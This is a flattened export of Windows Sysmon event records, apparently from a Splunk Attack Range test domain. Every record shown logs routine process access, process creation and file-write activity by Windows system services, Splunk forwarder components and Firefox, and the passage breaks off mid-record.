08:09:50.900{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.900{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F8CE-60EB-0A7E-00000000CF01}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.900{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F8CE-60EB-0A7E-00000000CF01}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.902{466BC892-F8CE-60EB-0A7E-00000000CF01}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=162418B1E59357F67B4FA170607BDD3A,SHA256=3E732E078AE43C70D6D87B138D1F6B1876B6AF6B0F5C71882F03624B9A3F64C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9FF9913392717F16A20492349C9AED91,SHA256=4AF38EF192BDAB3602E9080FF0DEBF8BCE7FE447AA642A4159B1A0C6843CB771,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CD4D0EBA19E0CD9A7FEC3B298A3DF8EF,SHA256=46A325F864BA92080A51FCBC04D42A8A05793281FA2AB94CA85530A5EF2F4CEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9794421CC9606DDE15ACD5FF578B53A9,SHA256=8E67CCF9480FE5660B0D51364ED0BADFD000A3D3AB96F8A816C38977B15DDBD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C180C870862104EBE277753F59F8A51E,SHA256=18FC05B504B00258DA4544C8CCE96334F70E7E71D3BB79E6A42BB0DFAF530D5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4F6732EC4C0AFA9EA071070F44815488,SHA256=6DD8754E059B37F872F7E233BD408CFA7DD9E6FBD9D91F0502C87C75A30904DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3947402F26457D8EF6FAEC8FD043F0DE,SHA256=5D292532B09F547F04C64B64E2D5EC036E02BC3BEE1247F122975D6312A48999,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3782BEBE784D71F9EA643CF1B3BE9BF3,SHA256=D282DA8B4216B1F1DF3E5AEC8E247DF878DB11986E7D1CA1BAB6C1A27502FEDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2DD8287CAD1FD0F7B68FE8ED319CB280,SHA256=3F7E1E90AB23152335C67F0052729DD0D199A4CDB75ED3C92585AC87B3A8A2F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CB51397D304AB12FED961CF311472061,SHA256=F47F3467B73C4644FA8E02AB3DDC47886E7A25B6C1014F37D87B0DFCF57E7F2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.831{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BFACFD04D2EEEC078DEC091EB41AAAB5,SHA256=AF538F65513B2B0B894CE4679034ADEE4119D39D4D599B58ADB4EC412D0DE0BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.562{466BC892-F8CE-60EB-097E-00000000CF01}902810036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.515{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5AC893D5272E7D437C5675DCF2DF128,SHA256=3BC470279AB4B34A267F07E4B381283BAD712BE60E8CE89F1B581D4C77BD8B72,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.247{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F8CE-60EB-097E-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.247{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F8CE-60EB-097E-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.247{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F8CE-60EB-097E-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.232{466BC892-F8CE-60EB-097E-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810761Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:51.886{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12E690345AFED92A943E48EE96AD3DC4,SHA256=F71CC96F34571B0C630A14CCD545673CA4DB2EB7340333F67ED5B043A35CA0C3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.850{466BC892-F8CF-60EB-0B7E-00000000CF01}96361072C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.534{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2F476CA613D21FB54CA9029AAB75EE2,SHA256=81B78C50124218A9088C1F6D42CD1743F3CF53C9EC4C7C1B9CDAA8CEBC3A74B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.534{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F8CF-60EB-0B7E-00000000CF01}9636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.526{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.526{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.526{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.526{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.526{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F8CF-60EB-0B7E-00000000CF01}9636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.526{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F8CF-60EB-0B7E-00000000CF01}9636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 